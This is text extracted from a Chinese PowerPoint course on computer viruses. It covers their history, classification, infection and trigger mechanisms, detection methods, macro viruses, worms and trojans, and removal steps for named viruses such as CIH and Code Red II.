《计算机病毒及防治》PPT课件.ppt

计算机病毒及防治,计算机病毒从它诞生之日起到现在，已成为了当今信息社会的一个癌症，它随着计算机网络的发展，已经传播到信息社会的每一个角落，并大肆破坏计算机数据、改变操作程序、摧毁计算机硬件，给人们造成了重大损失。为了更好地防范计算机及网络病毒，必须了解计算机病毒的机制，同时掌握计算机病毒的预防和清除办法。,16.1 计算机病毒概述,返回本章首页,16.1.1 计算机病毒的定义,“计算机病毒”最早是由美国计算机病毒研究专家F.Cohen博士提出的。 “计算机病毒”有很多种定义，国外最流行的定义为：计算机病毒，是一段附着在其他程序上的可以实现自我繁殖的程序代码。在中华人民共和国计算机信息系统安全保护条例中的定义为：“计算机病毒是指编制或者在计算机程序中插入的破坏计算机功能或者数据，影响计算机使用并且能够自我复制的一组计算机指令或者程序代码”。,返回本节,16.1.2 计算机病毒的发展历史,1计算机病毒发展简史 世界上第一例被证实的计算机病毒是在1983年，出现了计算机病毒传播的研究报告。同时有人提出了蠕虫病毒程序的设计思想；1984年，美国人Thompson开发出了针对UNIX操作系统的病毒程序。 1988年11月2日晚，美国康尔大学研究生罗特莫里斯将计算机病毒蠕虫投放到网络中。该病毒程序迅速扩展，造成了大批计算机瘫痪，甚至欧洲联网的计算机都受到影响，直接经济损失近亿美元。,2计算机病毒在中国的发展情况 在我国，80年代末，有关计算机病毒问题的研究和防范已成为计算机安全方面的重大课题。 1982年“黑色星期五”病毒侵入我国；1985年在国内发现更为危险的“病毒生产机”，生存能力和破坏能力极强。这类病毒有1537、CLME等。进入90年代，计算机病毒在国内的泛滥更为严重。 CIH病毒是首例攻击计算机硬件的病毒，它可攻击计算机的主板，并可造成网络的瘫痪。,3计算机病毒发展的10个阶段 （1）DOS引导阶段 （2）DOS可执行文件阶段 （3）混合型阶段 （4）伴随型阶段 （5）多形型阶段 （6）生成器，变体机阶段 （7）网络，蠕虫阶段 （8）Windows阶段 （9）宏病毒阶段 （10）Internet阶段,返回本节,计算机病毒的产生是计算机技术和以计算机为核心的社会信息化进程发展到一定阶段的必然产物。其产生的过程可分为： 程序设计传播潜伏触发、运行实行攻击。,究其产生的原因不外乎以下几种：,（1）一些计算机爱好者出于好奇或兴趣 （2）产生于个别人的报复心理 （3）来源于软件加密 （4）产生于游戏 （5）用于研究或实验而设计的“有用”程序 （6）由于政治经济和军事等特殊目的,16.1.3 计算机病毒的分类,病毒种类众多，分类如下： 1按传染方式分为引导型、文件型和混合型病毒 2按连接方式分为源码型、入侵型、操作系统型和外壳型病毒 3按破坏性可分为良性病毒和恶性病毒 4网络病毒,返回本节,16.1.4 计算机病毒的特点,（1）传染性（自我复制能力 ） （2）非授权性（夺取系统控制权 ） （3）隐蔽性 （4）潜伏性 （5）刻意编写，人为破坏 （6）不可预见性,返回本节,16.1.5 计算机病毒的隐藏之处和入侵途径,1病毒的隐藏之处 （1）可执行文件。 （2）引导扇区。 （ 3）表格和文档。 （4）Java小程序和ActiveX控件。 2病毒的入侵途径 （1）传统方法 （磁盘、光盘等） （2）Internet,返回本节,16.1.6 现代计算机病毒的流行特征,1攻击对象趋于混合型 2反跟踪技术 3增强隐蔽性 4加密技术处理 5病毒繁衍不同变种,增强隐蔽性： （1）避开修改中断向量值 （2）请求在内存中的合法身份 （3）维持宿主程序的外部特性 （4）不使用明显的感染标志,加密技术处理 ： （1）对程序段动态加密 （2）对显示信息加密 （3）对宿主程序段加密,返回本节,16.1.7 计算机病毒的破坏行为,（1）攻击系统数据区 （2）攻击文件 （3）攻击内存 （4）干扰系统运行，使运行速度下降 （5）干扰键盘、喇叭或屏幕 （6）攻击CMOS （7）干扰打印机 （8）网络病毒破坏网络系统,返回本节,16.1.8 计算机病毒的作用机制,一个引导病毒传染的实例,假定用硬盘启动，且该硬盘已染上了小球病毒，那么加电自举以后，小球病毒的引导模块就把全部病毒代码1024字节保护到了内存的最高段，即97C0：7C00处；然后修改INT 13H的中断向量，使之指向病毒的传染模块。以后，一旦读写软磁盘的操作通过INT 13H的作用，计算机病毒的传染块便率先取得控制权，它就进行如下操作：,1）读入目标软磁盘的自举扇区（BOOT扇区）。 2）判断是否满足传染条件。 3）如果满足传染条件（即目标盘BOOT区的01FCH偏移位置为5713H标志），则将病毒代码的前512字节写入BOOT引导程序，将其后512字节写入该簇，随后将该簇标以坏簇标志，以保护该簇不被重写。 4）跳转到原INT 13H的入口执行正常的磁盘系统操作。,一个文件病毒传染的实例,假如VVV.COM（或.EXE）文件已染有耶路撒冷病毒，那么运行该文件后，耶路撒冷病毒的引导模块会修改INT 21H的中断向量，使之指向病毒传染模块，并将病毒代码驻留内存，此后退回操作系统。以后再有任何加载执行文件的操作，病毒的传染模块将通过INT 21H的调用率先获得控制权，并进行以下操作：,1）读出该文件特定部分。 2）判断是否传染。 3）如果满足条件，则用某种方式将病毒代码与该可执行文件链接，再将链接后的文件重新写入磁盘。 4）转回原INT 21H入口，对该执行文件进行正常加载。,计算机病毒的一般构成,计算机病毒在结构上有着共同性，一般由引导部分、传染部分、表现部分三部分组成。 1 . 引导部分 也就是病毒的初始化部分，它随着宿主程序的执行而进入内存，为传染部分做准备。 2 . 传染部分 作用是将病毒代码复制到目标上去。一般病毒在对目标进行传染前，要首先判断传染条件是否满足，判断病毒是否已经感染过该目标等，如CIH病毒只针对Windows 95/98操作系统。,3 . 表现部分 是病毒间差异最大的部分，前两部分是为这部分服务的。它破坏被传染系统或者在被传染系统的设备上表现出特定的现象。大部分病毒都是在一定条件下才会触发其表现部分的。,计算机病毒的传染过程,计算机病毒的传染过程 1）驻入内存。 2）判断传染条件。 3）传染。,返回本节,计算机病毒的触发机制,感染、潜伏、可触发、破坏是病毒的基本特性。 目前病毒采用的触发条件主要有以下几种： 1日期触发：许多病毒采用日期做触发条件。日期触发大体包括：特定日期触发、月份触发、 前半年后半年触发 等。 2时间触发：时间触发包括特定的时间触发、染毒后累计工作时间触发、文件最后写入时间触发等。 3键盘触发：有些病毒监视用户的击键动作，当发现病毒预定的键人时，病毒被激活，进行某些特定操作。 键盘 触发包括击键次数触发、组合键触发、热启动触发等。,4感染触发：许多病毒的感染需要某些条件触发， 而且相当数量的病毒又以与感染有关的信息反过来作为破坏行为的触发条件，称为感染触发。它包括：运行感染文件个数触发、感染序数触发、感染磁盘数触发、感染失败触发等。 5启动触发：病毒对机器的启动次数计数，并将此值作为触发条件称为启动触发。 6访问磁盘次数触发：病毒对磁盘I/O访问的次数进行计数，以预定次数做触发条件叫访问磁盘次数触发。,7调用中断功能触发：病毒对中断调用次数计数，以预定次数做触发条件。 8CPU型号/主板型号触发：病毒能识别运行环境的CPU型号/主板型号，以预定CPU型号/主板型号做触发条件， 这 种病毒的触发方式奇特罕见。 病毒使用的触发条件是多种多样的，而且往往不只是使用上面所述的某一个条件，而是使用由多个条件组 合起来的触发条件。,计算机病毒的传染机制,1计算机病毒的传染方式 被动传染 (用户在进行拷贝磁盘或文件 ) 主动传染 (激活状态下自动传染 ) 2计算机病毒的传染过程 拷贝和内存传染。 3病毒传染机理 见前面的实例,计算机病毒的破坏机制,破坏机制在设计原则、工作原理上与传染机制基本相同。 它也是通过修改某一中断向量入口地址（一般为时钟中 断INT 8H,或与时钟中断有关的其他中断，如INT 1CH），使该中断向量指向病毒程序的破坏模块。 病毒破坏目标和攻击部位主要是：系统数据区、文件、内存、系统运行、运行速度、磁盘、屏幕显示、键盘、喇叭、打 印机、CMOS、主板等。,计算机病毒的引导机制,1、病毒的寄生对象 磁盘的引导扇区；可执行文件 2、病毒的寄生方式 替代法（引导扇区）；链接法（可执行文件） 3、病毒的引导过程 驻留内存；窃取系统控制权；恢复系统功能。,中断与计算机病毒,1中断基本概念 什么是中断？先打个比方。当一个经理正处理文件时，电话铃响了（中断请求），不得不在文件上做一个记号（返 回地址），暂停工作，去接电话（中断），并指示“按第二方案办”（调中断服务程序），然后，再静下心来（恢复中 断前状态），接着处理文件。 中断是CPU处理外部突发事件的一个重要技术。它能使CPU在运行过程中对外部事件发出的中断请求及时地进行处理， 处理完成后又立即返回断点，继续进行CPU原来的工作。,2中断与计算机病毒 与病毒有关的重要中断有： INT 08H和INT 1CH定时中断，有些病毒利用它们的记时判断激发条件。 INT 09H键盘输入中断，病毒用于监视用户击键情况。 INT 10H屏幕输入输出中断，一些病毒用于在屏幕上显示字符图形表现自己。 INT 13H磁盘输入输出中断，引导型病毒用于传染病毒和格式化磁盘。,INT 21H DOS功能调用，包含了DOS的大部分功能，已发现的绝大多数文件型病毒修改INT 21H中断， 因此也成为防 病毒的重点监视部位。 INT 24H DOS的严重错误处理中断，文件型病毒常进行修改，以防止传染写保护磁盘时被发现。,16.2.1 计算机病毒的检测,检测病毒方法有： 特征代码法 校验和法 行为监测法 软件模拟法,1、特征代码法,国外专家认为特征代码法是检测已知病毒的最简单、开销最小的方法。 特征代码法的实现步骤： 采集已知病毒样本；抽取特征代码；将特征代码纳入病毒数据库 ；打开被检测文件，搜索、检查文件中是否含有病毒数据库中的病毒特征代码。,特征代码法的优点是： 检测准确快速、可识别病毒的名称、误报警率低、依据检测结果，可做解毒处理。 其缺点是： 不能检测未知病毒；搜集已知病毒的特征代码，费用开销大；在网络上效率低（在网络服务器上，因长时间检索会使整个网络性能变坏）。,特征代码法特点：,速度慢 误报警率低 不能检查多态性病毒 不能对付隐蔽性病毒,多态（形型）性病毒是指采用特殊加密技术编写的病毒，这种病毒在每感染一个对象时，采用随机方法对病毒主体进行加密。多形型病毒主要是针对查毒软件而设计的，所以随着这类病毒的增多，使得查毒软件的编写变得更困难，并还会带来许多的误报。,2、校验和法,计算正常文件的内容校验和，将该校验和写入文件中或写入别的文件中保存。在文件使用过程中，定期地或每次使用文件前，检查文件现在内容算出的校验和与原来保存的校验和是否一致，因而可以发现文件是否感染，这种方法叫校验和法。,优点： 方法简单，能发现未知病毒，被查文件的细微变化也能发现。 缺点： 发布通行记录正常态的校验和，会误报警，不能识别病毒名称，不能对付隐蔽型病毒。,校验和法特点,既可发现已知病毒，又可发现未知病毒； 不能识别病毒类，不能报出病毒名称； 常常误报警； 影响文件的运行速度； 对隐蔽性病毒无效。,3、行为监测法,利用病毒的特有行为特征性来监测病毒的方法，称为行为监测法。 有一些行为是病毒的共同行为，而且比较特殊。在正常程序中，这些行为比较罕见。当程序运行时，监视其行为，如果发现了病毒行为，立即报警。,监测病毒的行为特征,A、占有INT 13H （磁盘输入输出中断） B、改DOS系统为数据区的内存总量 （为了防止DOS系统将病毒覆盖） C、对COM、EXE文件做写入动作 D、病毒程序与宿主程序的切换,优点： 可发现未知病毒、可相当准确地预报未知的多数病毒。 缺点： 可能误报警、不能识别病毒名称、实现时有一定难度。,4、软件模拟法,它是一种软件分析器，用软件方法来模拟和分析程序的运行。 主要用于检测多态性病毒。作为特征代码法的补充。,5、先知扫描法,该技术是专门针对于未知的电脑病毒所设计的，利用这种技术可以直接模拟CPU的动作来侦测出某些变种病毒的活动情况，并且研制出该病毒的病毒码。由于该技术较其他解毒技术严谨，对于比较复杂的程序在比对上会耗费比较多的时间，所以该技术的应用不那么广泛。,6、实时I/O扫描,实时地对数据的输入/输出动作做病毒码对比的动作，希望能够在病毒尚未被执行之前，就能够防堵下来。 理论上，这样的实时扫描程序会影响到整体的数据传输速率。,16.2.2 异常情况判断,计算机工作出现下列异常现象，则有可能感染了病毒： 1）屏幕出现异常图形或画面，这些画面可能是一些鬼怪，也可能是一些下落的雨点、字符、树叶等，并且系统很难退出或恢复。 2）扬声器发出与正常操作无关的声音，如演奏乐曲或是随意组合的、杂乱的声音。 3）磁盘可用空间减少，出现大量坏簇，且坏簇数目不断增多，直到无法继续工作。 4）硬盘不能引导系统。 5）磁盘上的文件或程序丢失。,6）磁盘读/写文件明显变慢，访问的时间加长。 7）系统引导变慢或出现问题，有时出现“写保护错”提示。 8）系统经常死机或出现异常的重启动现象。 9）原来运行的程序突然不能运行，总是出现出错提示。 10）打印机不能正常启动。,16.2.3 计算机病毒的防治,1建立、健全法律和管理制度 2加强教育和宣传 3采取更有效的技术措施 4网络计算机病毒的防治,采取更有效的技术措施,（1）系统安全 （2）软件过滤 （3）文件加密 （4）过程控制 （5）后备恢复 （6）其他有效措施,其他有效措施,1）重要的磁盘和重要的带后缀.COM和.EXE的文件赋予只读功能，避免病毒写到磁盘上或可执行文件中。 2）消灭传染源。 3）建立程序的特征值档案。 4）严格内存管理。 5）严格中断向量的管理。 6）强化物理访问控制措施 7）一旦发现病毒蔓延，要采用可靠的杀毒软件和请有经验的专家处理，必要时需报告计算机安全监察部门，特别要注意不要使其继续扩散。,16.3 宏病毒,16.3.1 宏病毒的分类 16.3.2 宏病毒的行为和特征 16.3.3 宏病毒的特点 16.3.4 宏病毒的防治和清除方法,返回本章首页,16.3.1 宏病毒的分类,1公（共）用宏病毒 这类宏病毒对所有的Word文档有效，其触发条件是在启动或调用Word文档时，自动触发执行。它有两个显著的特点： 1）只能用“Autoxxxx”来命名，即宏名称是用“Auto”开头，xxxx表示的是具体的一种宏文件名。如AutoOpen、AutoClose、AutoCopy等。 2）它们一定要附加在Word共用模板上才有“公用”作用。通常在用户不规定和另行编制其他的公用模板时，它们应是附加在Normal.dot模板上，或者首先要能将自己写进这样的模板才行。,2私用宏病毒 私用宏病毒与公用宏病毒的主要区别是：前者一般放在用户自定义的Word模板中，仅与使用这种模板的Word文档有关，即只有使用这个特定模板的文档，该宏病毒才有效，而对使用其他模板的文档，私用宏病毒一般不起作用。,返回本节,16.3.2 宏病毒的行为和特征,宏病毒是一种新形态的计算机病毒，也是一种跨平台式计算机病毒。可以在Windows、Windows 95/98/NT、OS/2、Macintosh System7等操作系统上执行病毒行为。 宏病毒的主要特征如下： 1）宏病毒会感染.DOC文档和.DOT模板文件。 2）宏病毒的传染通常是Word在打开一个带宏病毒的文档或模板时，激活宏病毒。,3）多数宏病毒包含AutoOpen、AutoClose、AutoNew和AutoExit等自动宏，通过这些自动宏病毒取得文档（模板）操作权。 4）宏病毒中总是含有对文档读写操作的宏命令。 5）宏病毒在.DOC文档、.DOT模板中以BFF（Binary File Format）格式存放，这是一种加密压缩格式，每个Word版本格式可能不兼容。 6）宏病毒具有兼容性。,返回本节,16.3.3 宏病毒的特点,1传播极快 2制作、变种方便 3破坏可能性极大 4 多平台交叉感染,返回本节,16.3.4 宏病毒的判断方法,在打开“宏病毒防护功能”的情况下，如果您的OFFICE文档在打开时，系统给出一个宏病毒警告框，那么您应该对这个文档保持高度警惕，它已被感染的几率极大。 注意：简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒！,（1）首选方法：用最新版的反病毒软件清除宏病毒 （2）应急处理方法：用写字板或Word 6.0 文档作为清除宏病毒的桥梁。 （3）如果已经感染了宏病毒，可按下面的方法清除: 替换掉（或删除）通用模板Normal.dot文件；使用普通的杀毒软件对所有的Word 文件进行杀毒 。,16.3.5 宏病毒的防治和清除方法,（4）宏病毒的防范。 考虑到大部分Word 用户使用的是普通的文字处理功能，很少有人使用宏编程，因此，为了能及早发现该病毒，避免不必要的损失，平时可将一个干净的Normal.dot 文件和杀宏病毒软件保存在软盘中，并加上写保护。当发现通用模板已被感染时，可用保存在软盘中的Normal.dot 文件替换已被感染的模板文件，然后运行杀毒软件。,16.4 网络计算机病毒,16.4.1 网络计算机病毒的特点 16.4.2 网络对病毒的敏感性 16.4.3 网络病毒实例电子邮件病毒,返回本章首页,16.4.1 网络计算机病毒的特点,在网络环境中，计算机病毒具有如下一些新的特点： （1）传染速度快 （2）传染面广 （3）传染形式多 （4）清除难度大 （5）破坏性强,返回本节,具体地说，其传播方式有： 1、病毒直接从有盘站拷贝到服务器中； 2、病毒先传染工作站，在工作站内存驻留,等运行网络盘内程序时再传染给服务器； 3、病毒先传染工作站，在工作站内存驻留，在病毒运行时直接通过映像路径传染到服务器中； 4、如果远程工作站被病毒侵入，病毒也可以通过通讯中数据交换进入网络服务器中。,16.4.2 网络病毒的传播方式,16.4.3 网络病毒实例 蠕虫病毒,1蠕虫的定义 Internet 蠕虫是无须计算机使用者干预即可运行的独立程序，它通过不停的获得网络中存在漏洞的计算机上的部分或全部控制权来进行传播。 蠕虫与病毒的最大不同在于它不需要人为干预，且能够自主不断地复制和传播。,2蠕虫的行为特征 2.1 蠕虫的工作流程 蠕虫程序的工作流程可以分为漏洞扫描、攻击、传染、现场处理四个阶段，如图2所示。,蠕虫程序扫描到有漏洞的计算机系统后，将蠕虫主体迁移到目标主机。然后，蠕虫程序进入被感染的系统，对目标主机进行现场处理。现场处理部分的工作包括：隐藏、信息搜集等。同时，蠕虫程序生成多个副本，重复上述流程。不同的蠕虫采取的IP生成策略可能并不相同，甚至随机生成。各个步骤的繁简程度也不同，有的十分复杂，有的则非常简单。,2.2 蠕虫的行为特征 自我繁殖： 蠕虫在本质上已经演变为黑客入侵的自动化工具， 当蠕虫被释放（release）后，从搜索漏洞，到利用搜索结果攻击系统，到复制副本，整个流程全由蠕虫自身主动完成。就自主性而言，这一点有别于通常的病毒。,利用软件漏洞： 任何计算机系统都存在漏洞，这些就蠕虫利用系统的漏洞获得被攻击的计算机系统的相应权限，使之进行复制和传播过程成为可能。这些漏洞是各种各样的，有操作系统本身的问题，有的是应用服务程序的问题，有的是网络管理人员的配置问题。正是由于漏洞产生原因的复杂性，导致各种类型的蠕虫泛滥。,造成网络拥塞： 在扫描漏洞主机的过程中，蠕虫需要：判断其它计算机是否存在；判断特定应用服务是否存在；判断漏洞是否存在等等，这不可避免的会产生附加的网络数据流量。同时蠕虫副本在不同机器之间传递，或者向随机目标的发出的攻击数据都不可避免的会产生大量的网络数据流量。即使是不包含破坏系统正常工作的恶意代码的蠕虫，也会因为它产生了巨量的网络流量，导致整个网络瘫痪，造成经济损失。,消耗系统资源： 蠕虫入侵到计算机系统之后，会在被感染的计算机上产生自己的多个副本，每个副本启动搜索程序寻找新的攻击目标。大量的进程会耗费系统的资源，导致系统的性能下降。这对网络服务器的影响尤其明显。,留下安全隐患： 大部分蠕虫会搜集、扩散、暴露系统敏感信息（如用户信息等），并在系统中留下后门。这些都会导致未来的安全隐患。,3、蠕虫病毒与一般病毒的异同,病毒类型：普通病毒 蠕虫病毒 存在形式：寄存文件 独立程序 传染机制：宿主程序运行 主动攻击 传染目标：本地文件 网络计算机,4、蠕虫的破坏和发展趋势,每一次蠕虫的爆发都会给社会带来巨大的损失。 目前蠕虫爆发的频率越来越快，技术越来越新，并与黑客技术相结合。尤其是近两年来，越来越多的蠕虫（如冲击波、振荡波等）出现。 对蠕虫进行深入研究，并提出一种行之有效的解决方案，为企业和政府提供一个安全的网络环境成为我们急待解决的问题。,5、企业防范蠕虫病毒措施,企业防治蠕虫病毒的时候需要考虑几个问题： 病毒的查杀能力； 病毒的监控能力； 新病毒的反应能力。,推荐的企业防范蠕虫病毒的策略如下： （1）加强网络管理员安全管理水平，提高安全意识。减少系统漏洞。 （2）建立病毒检测系统。能够在第一时间内检测到网络异常和病毒攻击。 （3）建立应急响应系统，将风险减少到最小！ （4）建立灾难备份系统。对于数据库和数据系统，必须采用定期备份，多机备份措施，防止意外灾难下的数据丢失！,对于局域网而言，可以采用以下一些主要手段： （1）在因特网接入口处安装防火墙式防杀计算机病毒产品，将病毒隔离在局域网之外。 （2）对邮件服务器进行监控，防止带毒邮件进行传播！ （3）对局域网用户进行安全培训。 （4）建立局域网内部的升级系统，包括各种操作系统的补丁升级，各种常用的应用软件升级，各种杀毒软件病毒库的升级等等！,6、对个人用户产生直接威胁的蠕虫病毒,对于个人用户而言，威胁大的蠕虫病毒采取的传播方式一般为电子邮件以及恶意网页等等。即以各种各样的欺骗手段诱惑用户点击的方式进行传播！ 威胁最大，难以根除，造成的损失也更大。 恶意网页确切的讲是一段黑客破坏代码程序，它内嵌在网页中，当用户在不知情的情况下打开含有病毒的网页时，病毒就会发作。 常常采取vb script和java script编程的形式！,个人用户对蠕虫病毒的防范措施,1安装合适的杀毒软件 赛门铁克公司的Norton系列杀毒软件 、瑞星、kv系列等杀毒软件。 2 经常升级病毒库 杀毒软件对病毒的查杀是以病毒的特征码为依据的。 3提高防杀毒意识 不要轻易点击陌生的站点，有可能里面就含有恶意代码！ 将IE安全级别改为“高” 。 4不随意查看陌生邮件，尤其是带有附件的邮件 升级IE和OE程序，及常用的其他应用程序！,16.4.4 网络病毒实例 特洛伊木马,特洛伊木马是一个包含在一个合法程序中的非法的程序。 一种黑客程序，本身不破坏数据，黑客利用其远程操纵受害计算机。 一般的木马都有客户端和服务器端两个执行程序。 通过各种途径放置木马程序。,16.4.5 网络病毒实例电子邮件病毒,1电子邮件病毒的特点 （1）邮件格式不统一，杀毒困难 （2）传播速度快，传播范围广，破坏力大 2电子邮件病毒的防范措施 1）首先，不要轻易打开陌生人来信中的附件文件。 2）对于比较熟悉、了解的朋友们寄来的信件，如果其信中夹带了程序附件，但是他却没有在信中提及或是说明，也不要轻易运行。,3）给别人发送程序文件甚至包括电子贺卡时，一定要先在自己的计算机中试试，确认没有问题后再发，以免好心办了坏事。 4）不断完善“网关”软件及病毒防火墙软件，加强对整个网络入口点的防范。 5）使用优秀的防毒软件对电子邮件进行专门的保护。 6）使用防毒软件同时保护客户机和服务器。 7）使用特定的SMTP杀毒软件。,返回本节,16.5 反病毒技术,16.5.1 计算机病毒的检测 16.5.2 计算机病毒的防治 16.5.3 计算机感染病毒后的修复,返回本章首页,防范计算机网络病毒的一些措施：,1）在网络中，尽量多用无盘工作站，不用或少用有软驱的工作站。 2）在网络中，要保证系统管理员有最高的访问权限，避免过多地出现超级用户。 3）对非共享软件，将其执行文件和覆盖文件如*.COM、*.EXE、*.OVL等备份到文件服务器上，定期从服务器上拷贝到本地硬盘上进行重写操作。 4）接收远程文件输入时，一定不要将文件直接写入本地硬盘，而应将远程输入文件写到软盘上，然后对其进行查毒，确认无毒后再拷贝到本地硬盘上。,5）工作站采用防病毒芯片，这样可防止引导型病毒。 6）正确设置文件属性，合理规范用户的访问权限。 7）建立健全网络系统安全管理制度，严格操作规程和规章制度，定期作文件备份和病毒检测。 8）目前预防病毒最好的办法就是在计算机中安装防病毒软件，这和人体注射疫苗是同样的道理。采用优秀的网络防病毒软件，如LAN Protect和LAN Clear for NetWare等。 9）为解决网络防病毒的要求，已出现了病毒防火墙，在局域网与Internet，用户与网络之间进行隔离。,返回本节,16.5.3 计算机感染病毒后的修复,1修复引导记录病毒 （1）修复感染的软盘 （2）修复感染的主引导记录 （3）利用反病毒软件修复,2修复可执行文件病毒 即使有经验的用户也会认为修复文件病毒感染很困难。一般要先用杀病毒软件杀毒，再用未感染的备份拷贝代替它，这是修复被感染程序文件的最有效途径。如果得不到备份，反病毒程序一般使用它们的病毒扫描器组件检测并修复感染的程序文件。如果文件被非覆盖型病毒感染，那么这个程序很可能会被修复。,返回本节,16.6 软件防病毒技术,返回本章首页,1防、杀毒软件的选购指标,（1）查杀病毒数量多，安全可靠 （2）要有实时反病毒“防火墙”技术 （3）内存占有量要低 （4）恢复数据能力 （5）扫描速度快、识别率高 （6）病毒清除测试,2常用的防、杀毒软件,诺顿（Norton AntiVirus） 瑞星系列 江民KV系列 金山毒霸系列 网络版,16.7 典型病毒实例CIH病毒介绍,16.7.1 CIH病毒 16.7.2 Code Red II病毒 16.7.3 RedLof病毒 16.7.4 FunLove病毒 16.7.5 求职信病毒 16.7.6 尼姆达病毒,返回本章首页,16.7.1 CIH病毒,CIH病毒是一种文件型病毒，又称Win95.CIH、Win32.CIH、PE_CIH ，建立在WINDOW95/98平台。 其宿主是Windows 95/98系统下的PE格式可执行文件即.EXE文件，,返回本节,CIH病毒具有以下特点：,受感染的.EXE文件的文件长度没有改变； DOS以及WIN 3.1 格式（NE格式）的可执行文件不受感染，并且在Win NT中无效。 用资源管理器中“工具查找文件或文件夹”的“高级包含文字”查找.EXE特征字符串-“CIH v”，在查找过程中，显示出一大堆符合查找特征的可执行文件。 若4月26日开机，显示器突然黑屏，硬盘指示灯闪烁不停，重新开机后，计算机无法启动。,病毒的危害,主要表现在于病毒发作后，硬盘数据全部丢失，甚至主板上的BIOS中的原内容被会彻底破坏，主机无法启动。只有更换BIOS，或是向固定在主板上的BIOS中重新写入原来版本的程序，才能解决问题。,病毒的检测和清除,目前，检测和清除CIH病毒的程序已有很多， KV、瑞星、Norton Antiviurs，这些杀病毒工具都非常有效。,16.7.2 Code Red II病毒,又称“红色代码II”，属蠕虫病毒，别名Worm.CodeRedII “红色代码”通过微软公司IIS系统漏洞进行感染，它使IIS服务程序处理请求数据包时溢出，导致把此“数据包”当作代码运行，病毒驻留后再次通过此漏洞感染其它服务器。使用服务器的端口80进行传播 。 “红色代码2”是“红色代码”的改良版，可以在遭到攻击的机器上植入“特洛伊木马”。,与其它病毒不同的是，“红色代码”不同于以往的文件型病毒和引导型病毒，并不将病毒信息写入被攻击服务器的硬盘。它只存在于内存，传染时不通过文件这一常规载体，而是借助这个服务器的网络连接攻击其它的服务器，直接从一台电脑内存传到另一台电脑内存。,手动检测及清除方法,（1）断开网络，以避免重复感染和感染其它机器。 （2）立即停止IIS服务。 （3）按Ctrl+Alt+Delete，选择“任务管理器” 选择“进程”标签 ，检查是否进程中有两个exploer.exe“。如果您找到 两个”exploer.exe“，说明木马已经在您的机器上运行了，您应当立刻杀掉木马程序；否则，说明您还没有执行木马程序，您可以转到第（5）步。 （4）在“任务管理器”菜单中选择：查看-选定列-线程计数，按确定。这时您会发现显示框中增加了新的一列“线程数“。检查两个“exploer.exe“, 显示只有一个线程的“exploer.exe “就是木马程序。您应当立刻结束这个进程。,清除,（5）重新启动系统，运行cmd，在cmd窗口中运行以下命令，以删除蠕虫病毒留下的后门。 C: CD C: ATTRIB -h -s -r explorer.exe Del explorer.exe Del C:inetpubscriptsroot.exe Del C:progra1Common1SystemMSADCRoot.exe D: CD D: Attrib -h -s -r explorer.exe Del explorer.exe Del D:inetpubscriptsroot.exe Del D:progra1Common1SystemMSADCRoot.exe 忽略其中任何错误。,清除,（6）修改被蠕虫改动过的注册表： 运行regedit 选择： HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots 选择/C,选择删除；选择/D, 选择删除。 选择：/MSADC，将217换为201。 选择：/scripts，将271换为201。 对于Windows 2000系统，需要打开： HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinLogon 将SFCDisable改为0。,（7）重新启动系统 （8）执行步骤4，给系统打补丁,16.7.3 RedLof病毒,此病毒可以在Windows 9X、Windows 2000、Windows XP等操作系统环境下正常运行。它感染脚本类型的文件，运行时，全盘查找脚本类型的文件(vbs,htm, html等)，如果找到，则将病毒自身加入这些文件的尾部，完成感染。 该病毒还会疯狂感染文件夹，会在感染的文件夹下产生两个文件，一个名为：desktop.ini的目录配置文件，一个名为：folder.htt的病毒体文件，当用户双击鼠标进入被感染的文件夹时，病毒就会被激活，由于病毒每激活一次，就会在内存中复制一次，所以当用户多次进入被感染的文件夹时，病毒就会大量进入内存，造成计算机运行速度越来越慢，而且该病毒还会随着信件模板，进行网络传播。,查杀方法：,1、用最新版杀毒软件。在杀毒过程中要关闭所有WINDOWS窗口，禁止使用WEB方式浏览“资源管理器”或“我的电脑”等。 2、在Windows操作系统环境下，要打开文件监控功能，先查杀内存然后在查杀所有硬盘文件。 3、在杀完毒之后应立即重新启动计算机。 4、如果用户在Windows操作系统环境下不能完全地清除此病毒，请到纯DOS操作环境下进行杀毒，将此病毒全部清除掉。,16.7.4 FunLove病毒,感染Win9X、NT/2000操作系统。 病毒侵入NT操作系统后，会产生一个Flcss.exe文件（位于%system%目录下，如windowssystem，windowssystem32，winntsystem），然后给NTOSKRNL.EXE 和 NTLDR打上补丁，取得admininstrator的控制权，再将自己生成为NT的一个服务，名称为FLC，然后开始复制（传染）到所有可达目录及子目录下的EXE、OCX、SCR文件中。复制完成后，通过搜索网络上其它机器，试图感染之。这就是我们为什么会发现计算机不管有没有设共享目录，就有用户联上来的原因。但如果该机器没有可写的共享目录，或可写共享目录是设了口令的，病毒是无法感染它的。,查杀方法：,1、取消共享。 2、确认NT操作系统是否被感染。通过查“控制面板”-“服务”中是否有FLC服务，确认病毒是否已进入内存；通过“查找” flcss.exe文件是否存在，判断病毒是否已破坏了NT； 3、停止FLC服务；删除flcss.exe病毒体；修补被FunLove破坏的NTOSKRNL.EXE 和 NTLDR文件，夺回控制权。 4、用杀毒软件查杀。,16.7.5 求职信病毒,又名Worm.klez，蠕虫病毒，通过邮件和可执行文件传播。 七大特征： 1.“求职信”系列变种病毒利用微软系统的漏洞，可以自动感染，无须打开附件，因此危害性很大。 2.变种具有很强的隐蔽性，可以“随机应变”地自动改换不同的邮件主题和内容，瓦解邮件接收者的警惕性。 3.在邮件内部存放发送信息的一部分，这些变种病毒会伪造虚假信息，掩盖病毒的真实来源。,4.能够绕开一些流行杀毒软件的监控，甚至专门针对一些杀毒软件进行攻击。 5.除开可以在网络上利用邮件进行传播外，这些变种病毒还可以利用局域网上的共享文件夹进行传染，其传播特点类似“尼姆达”病毒，因此对于某些不能查杀局域网共享文件病毒的单机版杀毒软件，这将意味着在网络环境下，根本无法彻底清除病毒。 6.目前已经开始在网络上出现的一些“求职信”变种的专杀工具，由于无法适用于所有的变种，因此在杀除一些变种病毒时，会连病毒带文件一同删除，结果造成杀病毒把电脑一起“杀死”的情况。 7.传统杀毒软件清除该病毒需要在DOS系统下进行。,查杀方法：,安全模式下，删除注册表项目是wink?.exe的键值。 还必须相应的将WINDOWS的SYSTEM目录下的该随机文件Wink?.exe删除,注意还必须将回收站清空。 打补丁 用专杀工具进行查杀。,16.7.6 尼姆达病毒,Worms.Nimda是一个新型蠕虫，通过email、共享网络资源、IIS服务器传播。同时它也是一个感染本地文件的新型病毒。 